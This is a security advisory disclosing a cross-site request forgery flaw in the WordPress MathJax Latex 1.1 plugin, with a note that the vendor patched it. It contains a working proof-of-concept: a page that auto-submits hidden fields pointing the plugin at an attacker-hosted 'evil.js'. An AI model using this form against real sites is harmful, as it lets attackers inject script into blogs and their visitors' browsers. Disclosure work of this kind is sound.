# Title: WordPress Mathjax Latex 1.1 Cross-Site Request Forgery Vulnerability
# Release Date: 25/03/13
# Author: Junaid Hussain [ illSecure Research Group ] 
# Contact: illSecResearchGroup@Gmail.com | Website: illSecure.com
# Software Link: http://downloads.wordpress.org/plugin/mathjax-latex.1.1.zip
# Tested on CentOs 5 - WordPress Version 3.5
There is no CSRF protection on the mathjax option page. This allows an attacker to specify arbitrary 
javascript that will be loaded with each post and also loaded onto the homepage of the wordpress blog
//##### CSRF - Proof Of Concept:
<body onload="javascript:document.forms[0].submit()">
<form id="mathjaxlatex" name="mathjaxlatex" action="http://[DOMAINNAME]/wp-admin/options-general.php?page=mathjax-latex.php" method='POST'>
<input type="hidden" name="mathjax_hidden" style="display:none;" value="Y">
<input type="checkbox" name="force_load" style="display:none;" value="1"CHECKED/>
<input type="checkbox" name="default_disabled" style="display:none;" value="1"CHECKED/>
<input type='textbox' name='mathjax_location' class='regular-text code' value='http://illsecure.com/code/evil.js' style="display:none;"/>       
//##### Patch:
The Vendor Was notified and a patch was released:
--- Patched Version: http://downloads.wordpress.org/plugin/mathjax-latex.1.2.1.zip
--- See ChangeLog: http://wordpress.org/extend/plugins/mathjax-latex/changelog/
Contact: illSecResearchGroup@gmail.com 
- Junaid Hussain
- http://illsecure.com

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WordPress Mathjax Latex Plugin 1.1 – CSRF Vulnerability
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